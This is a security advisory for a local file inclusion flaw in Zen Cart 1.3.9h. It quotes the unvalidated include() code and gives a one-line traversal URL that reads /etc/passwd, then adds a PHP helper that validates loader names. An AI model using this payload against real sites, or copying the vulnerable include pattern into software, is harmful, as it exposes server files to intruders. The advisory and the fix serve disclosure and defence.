Zen Cart 1.3.9h Local File Inclusion Vulnerability
Name              Zen Cart
Vendor            http://www.zen-cart.com
Versions Affected 1.3.9h
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-11-03
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
Zen Cart truly is the art of e-commerce; free,
user-friendly, open source shopping cart software. The
ecommerce web site design program is being developed by a
group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be
and should be done differently.
II. DESCRIPTION
_______________
A parameter is not properly sanitised before being used
by PHP's include() function.
III. ANALYSIS
_____________
Summary:
A) Local File Inclusion
A) Local File Inclusion
_______________________
Input passed to the "loader_file" parameter in
includes/initsystem.php is not properly verified before
being used to include files. This can be exploited to
include arbitrary files from local resources via
directory traversal attacks.
Successful exploitation requires that register_globals is
set to On.
The following is the vulnerable code:
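<?php
$base_dir = DIR_WS_INCLUDES . 'auto_loaders/';
// $loader_file is used below without any validation
if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) {
    $base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/';
}
// the unvalidated name is appended to the base directory and included
include($base_dir . $loader_file);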
IV. SAMPLE CODE
_______________
A) Local File Inclusion
http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd
V. FIX
______
No fix.
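
The include from section III with the loader name constrained before use, as an added example (not Zen Cart code and not a vendor fix). The helper resolve_loader_file(), the demo directory tree and the sample inputs are hypothetical and constructed for illustration.

```php
<?php
// Added example, not Zen Cart code. resolve_loader_file() is a hypothetical
// helper. Setting register_globals = Off also removes the precondition the
// advisory names; this check covers the include itself.
function resolve_loader_file(string $includesDir, $loaderFile): ?string
{
    // Accept only a bare file name ending in .php: no arrays, no path
    // separators, no NUL bytes.
    if (!is_string($loaderFile)
        || !preg_match('/\A[A-Za-z0-9_.-]+\.php\z/', $loaderFile)) {
        return null;
    }
    $autoDir = realpath($includesDir . '/auto_loaders');
    if ($autoDir === false) {
        return null;
    }
    // Same lookup order as the original code: overrides first, then default.
    foreach (['/overrides/', '/'] as $sub) {
        $candidate = realpath($autoDir . $sub . $loaderFile);
        // realpath() resolves symlinks and "..", so the result must still
        // sit under auto_loaders/ and be a regular file.
        $prefix = $autoDir . DIRECTORY_SEPARATOR;
        if ($candidate !== false
            && strncmp($candidate, $prefix, strlen($prefix)) === 0
            && is_file($candidate)) {
            return $candidate;
        }
    }
    return null;
}

// Constructed demo tree in the system temp directory.
$inc = sys_get_temp_dir() . '/loader_demo_' . getmypid() . '/includes';
mkdir($inc . '/auto_loaders/overrides', 0700, true);
file_put_contents($inc . '/auto_loaders/config.core.php', "<?php // constructed\n");

// Constructed inputs: one valid name, then traversal and type-confusion cases.
$inputs = ['config.core.php', '../../../../etc/passwd',
           'overrides/../config.core.php', ['config.core.php']];
foreach ($inputs as $input) {
    $path = resolve_loader_file($inc, $input);
    printf("%-36s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES),
           $path === null ? 'rejected' : 'would include ' . $path);
}
```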